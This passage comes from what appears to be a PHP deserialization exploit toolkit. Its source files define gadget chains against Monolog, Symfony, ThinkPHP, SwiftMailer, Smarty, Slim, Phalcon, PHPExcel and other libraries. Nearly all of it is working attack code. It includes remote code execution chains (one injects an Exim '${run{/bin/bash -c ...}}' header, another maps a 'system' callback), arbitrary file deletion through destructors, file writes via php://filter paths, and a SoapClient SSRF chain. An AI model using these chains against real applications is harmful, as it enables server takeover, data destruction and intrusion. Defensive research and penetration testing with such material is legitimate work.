[$command]; 32 | $this->handler = $this; 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | null] 19 | ); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/3/gadgets.php: -------------------------------------------------------------------------------- 1 | processors = $methods; 17 | 18 | } 19 | } 20 | 21 | class BufferHandler 22 | { 23 | protected $handler; 24 | protected $bufferSize = -1; 25 | protected $buffer; 26 | 27 | # ($record['level'] < $this->level) == false 28 | protected $level = null; 29 | protected $bubble = false; 30 | protected $formatter = null; 31 | protected $processors; 32 | 33 | function __construct($methods, $command) 34 | { 35 | $this->processors = null; 36 | $this->buffer = [$command]; 37 | $this->handler = new NativeMailerHandler($methods); 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | hasRecords = true; 13 | $this->rollbarLogger = $buffer; 14 | } 15 | } 16 | 17 | class BufferHandler 18 | { 19 | protected $bufferSize; 20 | protected $handler; 21 | protected $buffer; 22 | 23 | public function __construct($buffer) 24 | { 25 | $this->bufferSize = 2; 26 | $this->handler = $buffer; 27 | $this->buffer = [0 => array("level" => 100, 28 | "message" => 1, 29 | "context" => [], 30 | "extra" => [], 31 | "channel" => 1)]; 32 | } 33 | } 34 | 35 | class NativeMailerHandler 36 | { 37 | protected $level; 38 | protected $processors; 39 | protected $formatter; 40 | protected $maxColumnWidth; 41 | protected $parameters; 42 | protected $to; 43 | protected $headers; 44 | 45 | public function __construct($command) 46 | { 47 | $this->level = 1; 48 | $this->processors = ["array_reverse"]; 49 | // if $this->buffer[0] is carefully crafted 50 | // $this->format can be used to pass a payload through the 'body' parameter 51 | // via the LineFormatter 52 | // Here we used the headers param to pass the payload 53 | $this->formatter = new \Monolog\Formatter\LineFormatter(); 54 | $this->maxColumnWidth = 20; 55 | $this->parameters = ["-be"]; 56 | $this->headers = ['${run{/bin/bash -c "'.$command.'"}{yes}{no}}']; 57 | $this->to = ["init@localhost"]; 58 | } 59 | } 60 | } 61 | 62 | namespace Monolog\Formatter 63 | { 64 | class LineFormatter 65 | { 66 | protected $format; 67 | public function __construct() 68 | { 69 | $this->format = ""; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | __destruct() => close() => flushBuffer() => handleBatch($records) 7 | 8 | class FingersCrossedHandler { 9 | protected $passthruLevel; 10 | protected $buffer = array(); 11 | protected $handler; 12 | 13 | public function __construct($param, $handler) 14 | { 15 | $this->passthruLevel = 0; 16 | $this->buffer = ['test' => [$param, 'level' => null]]; 17 | $this->handler = $handler; 18 | } 19 | 20 | } 21 | 22 | class GroupHandler { 23 | protected $processors = array(); 24 | public function __construct($function) 25 | { 26 | $this->processors = ['current', $function]; 27 | } 28 | 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | __destruct() => close() => flushBuffer() => handleBatch($records) 7 | 8 | class FingersCrossedHandler { 9 | protected $passthruLevel; 10 | protected $buffer = array(); 11 | protected $handler; 12 | 13 | public function __construct($param, $handler) 14 | { 15 | $this->passthruLevel = 0; 16 | $this->buffer = ['test' => [$param, 'level' => null]]; 17 | $this->handler = $handler; 18 | } 19 | 20 | } 21 | 22 | class BufferHandler 23 | { 24 | protected $handler; 25 | protected $bufferSize = -1; 26 | protected $buffer; 27 | # ($record['level'] < $this->level) == false 28 | protected $level = null; 29 | protected $initialized = true; 30 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false 31 | protected $bufferLimit = -1; 32 | protected $processors; 33 | 34 | function __construct($function) 35 | { 36 | $this->processors = ['current', $function]; 37 | } 38 | } 39 | 40 | } 41 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/7/chain.php: -------------------------------------------------------------------------------- 1 | 0] 20 | ); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/7/gadgets.php: -------------------------------------------------------------------------------- 1 | processors = $methods; 14 | $this->buffer = [$command]; 15 | $this->handler = $this; 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /gadgetchains/PHPCSFixer/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | files = [$remote_path => $remote_path]; 12 | 13 | } 14 | 15 | } 16 | } 17 | 18 | /* 19 | public function __destruct() 20 | { 21 | $this->clean(); 22 | } 23 | 24 | 25 | 26 | 27 | public function clean() 28 | { 29 | foreach ($this->files as $file => $value) { 30 | $this->unlink($file); 31 | } 32 | $this->files = []; 33 | } 34 | 35 | private function unlink($path) 36 | { 37 | @unlink($path); 38 | } 39 | } 40 | */ 41 | 42 | 43 | ?> 44 | -------------------------------------------------------------------------------- /gadgetchains/PHPCSFixer/FD/2/chain.php: -------------------------------------------------------------------------------- 1 | temporaryFile = $remote_path; 11 | $this->fileRemoval = new \PhpCsFixer\FileRemoval(); 12 | 13 | } 14 | 15 | /* 16 | public function __destruct() 17 | { 18 | if (null !== $this->temporaryFile) { 19 | $this->fileRemoval->delete($this->temporaryFile); 20 | } 21 | } 22 | */ 23 | 24 | } 25 | } 26 | 27 | namespace PhpCsFixer 28 | { 29 | 30 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php 31 | class FileRemoval 32 | 33 | { 34 | 35 | public function delete($path) 36 | { 37 | if (isset($this->files[$path])) 38 | { 39 | unset($this->files[$path]); 40 | } 41 | $this->unlink($path); 42 | } 43 | private function unlink($path) 44 | { 45 | @unlink($path); 46 | } 47 | 48 | } 49 | } 50 | 51 | /* 52 | public function delete($path) 53 | { 54 | if (isset($this->files[$path])) { 55 | unset($this->files[$path]); 56 | } 57 | $this->unlink($path); 58 | } 59 | 60 | */ 61 | 62 | ?> 63 | -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | fileName = $filePath; 10 | } 11 | 12 | /* 13 | public function __destruct() { 14 | if (!is_null($this->fileHandle)) { 15 | fclose($this->fileHandle); // Will only produce a warning 16 | unlink($this->fileName); 17 | } 18 | $this->fileHandle = null; 19 | } 20 | */ 21 | } -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/2/chain.php: -------------------------------------------------------------------------------- 1 | _fileName = $filePath; 10 | } 11 | 12 | /* 13 | public function __destruct() { 14 | if (!is_null($this->_fileHandle)) { 15 | fclose($this->_fileHandle); // Will only produce a warning 16 | unlink($this->_fileName); 17 | } 18 | $this->_fileHandle = null; 19 | } // function __destruct() 20 | */ 21 | } -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/3/chain.php: -------------------------------------------------------------------------------- 1 | tempFileName = $filePath; 9 | } 10 | 11 | /* 12 | public function __destruct() 13 | { 14 | // Unlink temporary files 15 | if ($this->tempFileName != '') { 16 | @unlink($this->tempFileName); 17 | } 18 | } 19 | */ 20 | } -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/4/chain.php: -------------------------------------------------------------------------------- 1 | _tempFileName = $filePath; 9 | } 10 | 11 | /* 12 | public function __destruct() 13 | { 14 | // Unlink temporary files 15 | if ($this->_tempFileName != '') { 16 | @unlink($this->_tempFileName); 17 | } 18 | } 19 | */ 20 | } -------------------------------------------------------------------------------- /gadgetchains/Phalcon/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | _shared = false; 10 | $this->_definition = array( 11 | 'className' => '\Phalcon\Mvc\View\Engine\Php', 12 | 'arguments' => array(array('type' => 'parameter', 'value' => 'test')), 13 | 'calls' => array( 14 | array( 15 | 'method' => 'render', 16 | 'arguments' => array( 17 | array( 18 | 'type' => 'parameter', 19 | 'value' => 'php://input' 20 | ), array( 21 | 'type' => 'parameter', 22 | 'value' => array() 23 | ) 24 | ) 25 | ) 26 | ) 27 | ); 28 | } 29 | } 30 | } 31 | 32 | namespace Phalcon { 33 | class Di { 34 | protected $_services; 35 | 36 | public function __construct() { 37 | $this->_services = array('session' => new \Phalcon\Di\Service()); 38 | } 39 | } 40 | } 41 | 42 | namespace Phalcon\Http { 43 | class Cookie { 44 | protected $_dependencyInjector; 45 | protected $_name = "test"; 46 | protected $_expire = 0; 47 | protected $_httpOnly = 1; 48 | protected $_readed = true; 49 | protected $_restored = false; 50 | 51 | public function __construct() { 52 | $this->_dependencyInjector = new \Phalcon\Di(); 53 | } 54 | } 55 | } 56 | 57 | namespace Phalcon\Logger\Adapter { 58 | class File { 59 | protected $_transaction; 60 | protected $_queue; 61 | protected $_formatter; 62 | protected $_logLevel; 63 | protected $_fileHandler; 64 | protected $_path; 65 | protected $_options; 66 | 67 | function __construct() { 68 | $this->_path = new \Phalcon\Http\Cookie("test"); 69 | } 70 | } 71 | } 72 | 73 | -------------------------------------------------------------------------------- /gadgetchains/Pydio/Guzzle/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | [ new \Pydio\Core\Controller\ShutDownScheduler($function, $parameter), 'callRegisteredShutdown'] 18 | ]); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /gadgetchains/Pydio/Guzzle/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | methods = $methods; 16 | 17 | foreach ($methods as $name => $fn) { 18 | $this->{'_fn_' . $name} = $fn; 19 | } 20 | } 21 | } 22 | } 23 | 24 | namespace Pydio\Core\Controller 25 | { 26 | class ShutdownScheduler 27 | { 28 | private $callbacks; 29 | public function __construct($function, $parameter) { 30 | $this->callbacks = [[$function, $parameter]]; 31 | } 32 | } 33 | } 34 | 35 | 36 | -------------------------------------------------------------------------------- /gadgetchains/Slim/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | keys = $this->raw = $this->values = $array; 14 | } 15 | } 16 | } 17 | 18 | namespace Slim 19 | { 20 | class App 21 | { 22 | private $container; 23 | 24 | function __construct($container) 25 | { 26 | $this->container = $container; 27 | } 28 | } 29 | 30 | class Container extends \Pimple\Container 31 | { 32 | 33 | } 34 | } 35 | 36 | namespace Slim\Http 37 | { 38 | use \Slim\App; 39 | use \Slim\Container; 40 | 41 | abstract class Message 42 | { 43 | protected $headers; 44 | protected $body = ''; 45 | 46 | function __construct($function, $parameter) 47 | { 48 | $z = new App(new Container(['has' => $function])); 49 | $y = new App($z); 50 | $this->headers = new App(new Container(['all' => [$y, $parameter]])); 51 | } 52 | } 53 | 54 | class Response extends Message 55 | { 56 | 57 | } 58 | } -------------------------------------------------------------------------------- /gadgetchains/Smarty/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | is_locked = false; 12 | unlink($cached->lock_id); 13 | } 14 | } 15 | 16 | class Smarty_Template_Cached 17 | { 18 | public $lock_id = null; 19 | public $is_locked = true; 20 | 21 | public function __construct() 22 | { 23 | $this->handler = new Smarty_Internal_CacheResource_File(); 24 | $this->lock_id = ''; 25 | } 26 | 27 | public function setlock($lock_id){ 28 | if($lock_id){ 29 | $this->lock_id = $lock_id; 30 | } 31 | } 32 | } 33 | 34 | class Smarty_Internal_TemplateBase 35 | { 36 | } 37 | 38 | class Smarty extends Smarty_Internal_TemplateBase 39 | { 40 | public $cache_locking = true; 41 | public $cache_dir; 42 | public $use_sub_dirs; 43 | public function __construct(){ 44 | $this->cache_locking = 1; 45 | $this->cache_dir = "/"; 46 | $this->use_sub_dirs = true; 47 | $this->cache = true; 48 | } 49 | } 50 | 51 | class Smarty_Internal_Template extends Smarty_Internal_TemplateBase 52 | { 53 | 54 | public $cached; 55 | public $smarty; 56 | 57 | public function __construct($lock_id){ 58 | $this->smarty = new Smarty(); 59 | $this->cached = new Smarty_Template_Cached(); 60 | $this->setlock($lock_id); 61 | } 62 | 63 | public function setlock($lock_id){ 64 | $this->cached->setlock($lock_id); 65 | } 66 | 67 | } 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /gadgetchains/Smarty/SSRF/1/chain.php: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /gadgetchains/Smarty/SSRF/1/gadgets.php: -------------------------------------------------------------------------------- 1 | handler = new SoapClient(null, [ 9 | 'uri' => $res['scheme'] . '://' . $res['host'] . '/', 10 | 'location' => $url 11 | ]); 12 | } 13 | } 14 | 15 | class Smarty 16 | { 17 | public $cache_locking = true; 18 | } 19 | 20 | class Smarty_Internal_Template 21 | { 22 | public $cached; 23 | public $smarty; 24 | 25 | public function __construct($url) 26 | { 27 | $this->smarty = new Smarty(); 28 | $this->cached = new Smarty_Template_Cached($url); 29 | } 30 | } 31 | ?> 32 | -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | path = $path; 10 | } 11 | } 12 | 13 | class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream 14 | { 15 | public function __construct($path) 16 | { 17 | parent::__construct($path); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | _encoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 20 | $this->_paramEncoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 21 | $this->_grammar = new Swift_Mime_Grammar(); 22 | } 23 | } 24 | 25 | class Swift_Mime_SimpleHeaderSet 26 | { 27 | private $_factory; 28 | 29 | function __construct() 30 | { 31 | $this->_factory = new Swift_Mime_SimpleHeaderFactory(); 32 | } 33 | } 34 | 35 | class Swift_Mime_ContentEncoder_RawContentEncoder 36 | { 37 | 38 | } 39 | 40 | class Swift_Mime_SimpleMimeEntity 41 | { 42 | private $_headers; 43 | private $_body; 44 | private $_encoder; 45 | private $_cache; 46 | private $_cacheKey = 'something'; 47 | 48 | function __construct($cache, $body) 49 | { 50 | $this->_cache = $cache; 51 | $this->_body = $body; 52 | $this->_encoder = new Swift_Mime_ContentEncoder_RawContentEncoder(); 53 | $this->_headers = new Swift_Mime_SimpleHeaderSet(); 54 | } 55 | } 56 | 57 | class Swift_Message extends Swift_Mime_SimpleMimeEntity 58 | { 59 | private $headerSigners = []; 60 | private $bodySigners = []; 61 | private $savedMessage = []; 62 | 63 | function __construct($headerSigner, $cache, $body) 64 | { 65 | parent::__construct($cache, $body); 66 | $this->headerSigners = [$headerSigner]; 67 | } 68 | } 69 | 70 | class Swift_Signers_DomainKeySigner 71 | { 72 | protected $_privateKey = <<_bound = [$_bound]; 94 | } 95 | } 96 | 97 | class Swift_KeyCache_ArrayKeyCache 98 | { 99 | private $_contents = []; 100 | private $_stream; 101 | 102 | function __construct($_stream) 103 | { 104 | $this->_stream = $_stream; 105 | } 106 | } 107 | 108 | class Swift_KeyCache_SimpleKeyCacheInputStream 109 | { 110 | private $_keyCache; 111 | private $_nsKey = 'something'; 112 | private $_itemKey = 'something'; 113 | private $_writeThrough = null; 114 | 115 | function __construct($_writeThrough) 116 | { 117 | $this->_keyCache = new Swift_KeyCache_ArrayKeyCache(null); 118 | $this->_writeThrough = $_writeThrough; 119 | } 120 | } 121 | 122 | abstract class Swift_ByteStream_AbstractFilterableInputStream 123 | { 124 | } 125 | 126 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream 127 | { 128 | private $_path; 129 | private $_mode = 'w+b'; 130 | 131 | function __construct($_path) 132 | { 133 | $this->_path = $_path; 134 | } 135 | } -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | encoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 20 | $this->paramEncoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 21 | $this->grammar = new Swift_Mime_Grammar(); 22 | } 23 | } 24 | 25 | class Swift_Mime_SimpleHeaderSet 26 | { 27 | private $factory; 28 | 29 | function __construct() 30 | { 31 | $this->factory = new Swift_Mime_SimpleHeaderFactory(); 32 | } 33 | } 34 | 35 | class Swift_Mime_ContentEncoder_RawContentEncoder 36 | { 37 | 38 | } 39 | 40 | class Swift_Mime_SimpleMimeEntity 41 | { 42 | private $headers; 43 | private $body; 44 | private $encoder; 45 | private $cache; 46 | private $cacheKey = 'something'; 47 | 48 | function __construct($cache, $body) 49 | { 50 | $this->cache = $cache; 51 | $this->body = $body; 52 | $this->encoder = new Swift_Mime_ContentEncoder_RawContentEncoder(); 53 | $this->headers = new Swift_Mime_SimpleHeaderSet(); 54 | } 55 | } 56 | 57 | class Swift_Message extends Swift_Mime_SimpleMimeEntity 58 | { 59 | private $headerSigners = []; 60 | private $bodySigners = []; 61 | private $savedMessage = []; 62 | 63 | function __construct($headerSigner, $cache, $body) 64 | { 65 | parent::__construct($cache, $body); 66 | $this->headerSigners = [$headerSigner]; 67 | } 68 | } 69 | 70 | class Swift_Signers_DomainKeySigner 71 | { 72 | protected $privateKey = <<bound = [$bound]; 94 | } 95 | } 96 | 97 | class Swift_KeyCache_ArrayKeyCache 98 | { 99 | private $contents = []; 100 | private $stream; 101 | 102 | function __construct($stream) 103 | { 104 | $this->stream = $stream; 105 | } 106 | } 107 | 108 | class Swift_KeyCache_SimpleKeyCacheInputStream 109 | { 110 | private $keyCache; 111 | private $nsKey = 'something'; 112 | private $itemKey = 'something'; 113 | private $writeThrough = null; 114 | 115 | function __construct($writeThrough) 116 | { 117 | $this->keyCache = new Swift_KeyCache_ArrayKeyCache(null); 118 | $this->writeThrough = $writeThrough; 119 | } 120 | } 121 | 122 | abstract class Swift_ByteStream_AbstractFilterableInputStream 123 | { 124 | } 125 | 126 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream 127 | { 128 | private $path; 129 | private $mode = 'w+b'; 130 | 131 | function __construct($path) 132 | { 133 | $this->path = $path; 134 | } 135 | } -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FW/3/chain.php: -------------------------------------------------------------------------------- 1 | _buffer = $_buffer; 20 | $this->_eventDispatcher = $_eventDispatcher; 21 | } 22 | } 23 | 24 | abstract class Swift_ByteStream_AbstractFilterableInputStream 25 | { 26 | private $_filters = array(); 27 | private $_writeBuffer; 28 | 29 | function __construct($_writeBuffer) 30 | { 31 | $this->_writeBuffer = $_writeBuffer; 32 | } 33 | } 34 | 35 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream 36 | { 37 | private $_path; 38 | private $_mode = 'w+b'; 39 | 40 | function __construct($_path, $_writeBuffer) 41 | { 42 | parent::__construct($_writeBuffer); 43 | $this->_path = $_path; 44 | } 45 | } -------------------------------------------------------------------------------- /gadgetchains/Symfony/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | token = uniqid(); 19 | $this->ip = new \Symfony\Component\Finder\Expression\Expression( 20 | $path, $content 21 | ); 22 | } 23 | } 24 | } 25 | 26 | namespace Symfony\Component\Finder\Expression 27 | { 28 | class Expression 29 | { 30 | private $value; 31 | 32 | function __construct($path, $content) 33 | { 34 | $this->value = new \Symfony\Component\Console\Helper\Table( 35 | $path, $content 36 | ); 37 | } 38 | } 39 | } 40 | 41 | namespace Symfony\Component\Console\Helper 42 | { 43 | class Table 44 | { 45 | private $headers = ['a']; 46 | private $rows = []; 47 | private $columnWidths = [100]; 48 | private $numberOfColumns; 49 | private $output; 50 | private $style; 51 | private static $styles; 52 | 53 | function __construct($path, $content) 54 | { 55 | $this->output = new \Symfony\Component\Config\ConfigCache($path); 56 | $this->style = new TableStyle($content); 57 | } 58 | } 59 | 60 | class TableStyle 61 | { 62 | private $paddingChar = ' '; 63 | private $horizontalBorderChar = ''; 64 | private $verticalBorderChar; 65 | private $crossingChar = ''; 66 | private $cellHeaderFormat = '%s'; 67 | private $cellRowFormat = '%s'; 68 | private $cellRowContentFormat = ' %s '; 69 | private $borderFormat = '%s'; 70 | private $padType = STR_PAD_RIGHT; 71 | 72 | function __construct($verticalBorderChar) 73 | { 74 | $this->verticalBorderChar = $verticalBorderChar; 75 | } 76 | } 77 | } 78 | 79 | namespace Symfony\Component\Config 80 | { 81 | class ConfigCache 82 | { 83 | private $debug; 84 | private $file; 85 | 86 | function __construct($file) 87 | { 88 | $this->file = $file; 89 | } 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | state = 1; 23 | $this->skippedFile = 'php://filter/convert.base64-decode/resource=' . $path; 24 | $this->isSkipped = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' . base64_encode($data); 25 | } 26 | } 27 | } -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | deferred = $command; 36 | $this->namespace = []; 37 | } 38 | } 39 | 40 | class ApcuAdapter extends AbstractAdapter 41 | { 42 | } 43 | } -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | )'; 11 | 12 | public function generate(array $parameters) 13 | { 14 | $code = $parameters['code']; 15 | 16 | return new \Symfony\Component\Process\ProcessPipes( 17 | new \Symfony\Component\Finder\Expression\Expression( 18 | new \Symfony\Component\Templating\PhpEngine( 19 | new \Symfony\Component\Templating\Storage\StringStorage( 20 | $code 21 | )))); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/2/gadgets.php: -------------------------------------------------------------------------------- 1 | template = ''; 8 | } 9 | } 10 | } 11 | 12 | namespace Symfony\Component\Templating{ 13 | class TemplateNameParser{} 14 | class TemplateReference{} 15 | class PhpEngine{ 16 | protected $parser; 17 | protected $cache; 18 | protected $current; 19 | protected $globals = array(); 20 | public function __construct($s){ 21 | $this->parser = new TemplateNameParser; 22 | $this->current = new TemplateReference; 23 | $this->cache = array(NULL=>$s); 24 | } 25 | } 26 | } 27 | 28 | namespace Symfony\Component\Finder\Expression{ 29 | class Expression{ 30 | private $value; 31 | public function __construct($p){ 32 | $this->value = $p; 33 | } 34 | } 35 | } 36 | 37 | namespace Symfony\Component\Process{ 38 | class ProcessPipes{ 39 | private $files = array(); 40 | public function __construct($e){ 41 | $this->files = array($e); 42 | } 43 | } 44 | } 45 | 46 | ?> 47 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | )'; 11 | 12 | public function generate(array $parameters) 13 | { 14 | $code = $parameters['code']; 15 | 16 | return new \Symfony\Component\Process\Pipes\WindowsPipes( 17 | new \Symfony\Component\Finder\Expression\Expression( 18 | new \Symfony\Component\Templating\PhpEngine( 19 | new \Symfony\Component\Templating\Storage\StringStorage( 20 | $code 21 | )))); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/3/gadgets.php: -------------------------------------------------------------------------------- 1 | template = ''; 8 | } 9 | } 10 | } 11 | 12 | namespace Symfony\Component\Templating{ 13 | class TemplateNameParser{} 14 | class TemplateReference{} 15 | class PhpEngine{ 16 | protected $parser; 17 | protected $cache; 18 | protected $current; 19 | protected $globals = array(); 20 | public function __construct($s){ 21 | $this->parser = new TemplateNameParser; 22 | $this->current = new TemplateReference; 23 | $this->cache = array(NULL=>$s); 24 | } 25 | } 26 | } 27 | 28 | namespace Symfony\Component\Finder\Expression{ 29 | class Expression{ 30 | private $value; 31 | public function __construct($p){ 32 | $this->value = $p; 33 | } 34 | } 35 | } 36 | 37 | namespace Symfony\Component\Process\Pipes{ 38 | class WindowsPipes{ 39 | private $files = array(); 40 | public function __construct($e){ 41 | $this->files = array($e); 42 | } 43 | } 44 | } 45 | 46 | ?> 47 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | 28 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/4/gadgets.php: -------------------------------------------------------------------------------- 1 | poolHash = $poolHash; 12 | $this-> innerItem = $parameter; 13 | } 14 | } 15 | } 16 | 17 | namespace Symfony\Component\Cache\Adapter { 18 | 19 | class ProxyAdapter 20 | { 21 | private $poolHash ; 22 | private $setInnerItem; 23 | public function __construct($poolHash, $function) 24 | { 25 | $this-> poolHash = $poolHash; 26 | $this-> setInnerItem = $function; 27 | } 28 | } 29 | 30 | class TagAwareAdapter 31 | { 32 | private $deferred = []; 33 | private $pool; 34 | public function __construct($deferred, $pool) 35 | { 36 | $this-> deferred = $deferred; 37 | $this-> pool = $pool; 38 | } 39 | } 40 | } 41 | 42 | ?> 43 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | createCacheItem = $createCacheItem; 14 | $this->pool = $pool; 15 | $this->namespace = ''; 16 | } 17 | } 18 | 19 | 20 | class NullAdapter 21 | { 22 | private $createCacheItem; 23 | 24 | public function __construct($createCacheItem) 25 | { 26 | $this->createCacheItem = $createCacheItem; 27 | } 28 | } 29 | } 30 | 31 | namespace Symfony\Component\Console\Helper 32 | { 33 | class Dumper 34 | { 35 | private $handler; 36 | 37 | public function __construct($handler) 38 | { 39 | $this->handler = $handler; 40 | } 41 | } 42 | } 43 | 44 | 45 | namespace Symfony\Component\Cache\Traits 46 | { 47 | class RedisProxy 48 | { 49 | private $redis; 50 | private $initializer; 51 | 52 | public function __construct($initializer, $redis) 53 | { 54 | $this->initializer = $initializer; 55 | $this->redis = $redis; 56 | } 57 | } 58 | } 59 | 60 | namespace Symfony\Component\Form 61 | { 62 | 63 | class FormErrorIterator 64 | { 65 | public $form; 66 | private $errors; 67 | 68 | function __construct($errors, $form) 69 | { 70 | $this->errors = $errors; 71 | $this->form = $form; 72 | } 73 | } 74 | } 75 | 76 | 77 | namespace Symfony\Component\HttpKernel\DataCollector 78 | { 79 | class DumpDataCollector 80 | { 81 | protected $data; 82 | private $stopwatch; 83 | private $fileLinkFormat; 84 | private $dataCount = 0; 85 | private $isCollected = false; 86 | private $clonesCount = 0; 87 | private $clonesIndex = 0; 88 | 89 | public function __construct($function, $command) 90 | { 91 | $this->data = [ 92 | [ 93 | "data" => "1", 94 | "name" => new \Symfony\Component\Form\FormErrorIterator([ 95 | new \Symfony\Component\Form\FormErrorIterator( 96 | [], 97 | new \Symfony\Component\Cache\Traits\RedisProxy( 98 | new \Symfony\Component\Console\Helper\Dumper([ 99 | new \Symfony\Component\Cache\Adapter\ProxyAdapter( 100 | 'dd', // exit function 101 | new \Symfony\Component\Cache\Adapter\NullAdapter($function) 102 | ), 103 | "getItem" 104 | ]), 105 | $command 106 | ) 107 | )], 108 | null 109 | ), 110 | "file" => "3", 111 | "line" => "4" 112 | ], 113 | null, 114 | null 115 | ]; 116 | } 117 | } 118 | } 119 | -------------------------------------------------------------------------------- /gadgetchains/TCPDF/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | imagekeys = [ 8 | $remote_path 9 | ]; 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | pathPrefix = '/'; 8 | } 9 | } 10 | class Local extends AbstractAdapter{ 11 | 12 | } 13 | } 14 | 15 | namespace League\Flysystem\Cached\Storage { 16 | use \League\Flysystem\Adapter\Local; 17 | abstract class AbstractCache{ 18 | protected $autosave = false; 19 | protected $cache = []; 20 | function __construct($code) 21 | { 22 | $this->autosave = false; 23 | $this->cache = ["axin"=>$code]; 24 | } 25 | } 26 | 27 | class Adapter extends AbstractCache{ 28 | protected $adapter; 29 | protected $file; 30 | function __construct($path, $code) 31 | { 32 | parent::__construct($code); 33 | $this->adapter = new \League\Flysystem\Adapter\Local(); 34 | $this->file = $path; 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | complete = \str_rot13($data); 11 | } 12 | } 13 | } 14 | 15 | namespace think\filesystem { 16 | class CacheStore extends \League\Flysystem\Cached\Storage\AbstractCache { 17 | protected $store; 18 | protected $key; 19 | protected $expire; 20 | 21 | public function __construct($path, $data) 22 | { 23 | parent::__construct($data); 24 | $this->key = "syclover"; 25 | $this->expire = 1; 26 | $this->store = new \think\cache\driver\File($path); 27 | } 28 | } 29 | } 30 | 31 | namespace think\cache { 32 | abstract class Driver { 33 | protected $writeTimes = 0; 34 | } 35 | } 36 | 37 | namespace think\cache\driver { 38 | class File extends \think\cache\Driver { 39 | protected $options; 40 | 41 | public function __construct($path) 42 | { 43 | $this->options = [ 44 | 'expire' => 0, 45 | 'cache_subdir' => false, 46 | 'prefix' => '', 47 | 'path' => "php://filter/write=string.rot13/resource=$path", 48 | 'hash_type' => 'md5', 49 | 'data_compress' => false, 50 | 'tag_prefix' => 'tag:', 51 | 'serialize' => [], 52 | ]; 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | files = array($files); 9 | } 10 | } 11 | } 12 | 13 | namespace think\model\concern { 14 | trait Conversion 15 | { 16 | protected $append = array("Smi1e" => "1"); 17 | } 18 | 19 | trait Attribute 20 | { 21 | private $data; 22 | private $withAttr = array("Smi1e" => "system"); 23 | 24 | public function get($system) 25 | { 26 | $this->data = array("Smi1e" => "$system"); 27 | } 28 | } 29 | } 30 | namespace think { 31 | abstract class Model 32 | { 33 | use model\concern\Attribute; 34 | use model\concern\Conversion; 35 | } 36 | } 37 | 38 | namespace think\model{ 39 | use think\Model; 40 | class Pivot extends Model 41 | { 42 | public function __construct($system) 43 | { 44 | $this->get($system); 45 | } 46 | } 47 | } -------------------------------------------------------------------------------- 